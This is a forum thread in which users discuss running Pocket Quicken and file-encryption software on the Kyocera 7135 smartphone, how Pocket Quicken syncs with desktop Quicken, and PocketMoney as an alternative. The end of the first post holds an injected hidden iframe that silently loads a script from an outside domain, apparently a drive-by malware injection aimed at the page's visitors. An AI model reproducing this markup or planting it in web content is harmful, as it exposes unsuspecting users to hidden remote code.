+ Reply to Thread

Thread: Pocket Quicken

Pocket Quicken & File encryption

I use Pocket Quicken on my Vx. Does anyone know if it will run just as well on the 7135? I really need to know. It will be one of the factors on my getting the Kyocera 7135. The other factor will be on file encryption. Will the application that I'm running on the Vx, run and not interfer with the phone function.

Anybody using file encryption on the 7135? I've been using product from KastenChase that seems to work OK on the Vx.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

My brother runs Pocket Quicken on his 7135 with no problems. I haven't tried it on mine.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

It's run flawlessly on my 7135 since January.

Pocket Quicken has been working perfectly for the past 2 months. No problems at all. It's really a great product that I would strongly recommend to anyone who uses Quicken.

Itsnotjustme:

How does Pocket Quicken work exactly? I use Quicken, so does Pocket Quicken allow you to input entries or does it just add up reciepts and expenses?

Thanks!

AJR

PocketQuicken works great!

I use PocketQuicken with my 7135 and it works great! My wife yelled at me all the time because I didn't put receipts into quicken everyday. I now add an entry into PocketQuicken everywhere I go, then sync it every night. When I go into Quicken on my PC, it shows the new transactions that have been downloaded, and verifies that you want them added to the registry (in case you've added them allready from a reconcile or something). It also always keeps me up-to-date on what my checking, savings, and credit card balances are so I know if I can use a certain credit card for a purchase.

Originally posted by Artkazi
    Itsnotjustme:
    How does Pocket Quicken work exactly? I use Quicken, so does Pocket Quicken allow you to input entries or does it just add up reciepts and expenses?
    Thanks!
    You can input entries, do splits, transfers, it remembers the next check # etc. then syncs with the PC data file. It only has very limited support for stocks, investment, loans accounts (display balances only?). Pretty much full functionality on cash, checking, and credit card accounts.

-Quick

Unfortunately, my wife prefers Microsoft Money. Forgive my ignorance but is there an equivalent program for Microsoft Money?

William
    I got my Kyocera 7135 and loving it!!!

AJR
    Originally posted by William
    Unfortunately, my wife prefers Microsoft Money. Forgive my ignorance but is there an equivalent program for Microsoft Money?
    You can try PocketMoney by HandMark. It's said to work with both Quicken and M$Money! It's $29.95 to buy (trial version available), and it looks like you get 2 other programs with it - MPG (Management of auto expenses) and Check Please (Calculate tax, tips and split checks).

Hope this helps!
    AJ